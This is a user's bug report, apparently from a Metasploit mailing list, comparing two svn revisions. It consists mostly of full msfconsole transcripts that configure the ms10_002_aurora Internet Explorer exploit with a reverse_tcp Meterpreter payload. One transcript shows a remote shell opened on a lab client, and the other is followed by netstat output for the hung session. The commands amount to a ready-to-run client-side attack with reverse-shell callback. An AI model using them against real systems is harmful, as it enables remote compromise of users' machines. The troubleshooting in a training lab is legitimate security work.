Hello,
I updated metasploit to svn r9705. After trying ms10_002_aurora & ms06_001_wmf_setabortproc, It appears that the session from client browser just hang in establised state.
ms10_002_aurora exploit shows result comparison between svn r9662 and svn r9705 (OS, Metasploit's framework and console are same version)
root@bt:~# uname -a
Linux bt 2.6.30.9 #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux
msf > version
Framework: 3.4.1-dev.9625
Console : 3.4.1-dev.9652
SVN R9662 =========
msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.12.152
SRVHOST => 192.168.12.152
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.12.152
LHOST => 192.168.12.152
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > set EXITFUNC thread
EXITFUNC => thread
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.12.152:443
[*] Using URL:
http://192.168.12.152:80/[*] Server started.
msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.13.72
[*] Sending stage (748032 bytes) to 192.168.13.72
[*] Meterpreter session 1 opened (192.168.12.152:443 -> 192.168.13.72:2257) at Wed Jul 07 05:42:37 -0400 2010
msf exploit(ms10_002_aurora) > sessions -l
Active sessions ===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter CLIENT272\offsec @ CLIENT272 192.168.12.152:443 -> 192.168.13.72:2257
SVN R9705 =========
msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.12.152
SRVHOST => 192.168.12.152
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.12.152
LHOST => 192.168.12.152
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > set EXITFUNC thread
EXITFUNC => thread
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Using URL:
http://192.168.12.152:80/[*] Server started.
msf exploit(ms10_002_aurora) >
root@bt:~# netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.12.152:80 0.0.0.0:* LISTEN 5710/ruby
tcp 0 0 192.168.12.152:46506 192.168.13.72:3389 ESTABLISHED 5689/rdesktop
tcp 0 0 192.168.12.152:80 192.168.13.72:2259 ESTABLISHED 5710/ruby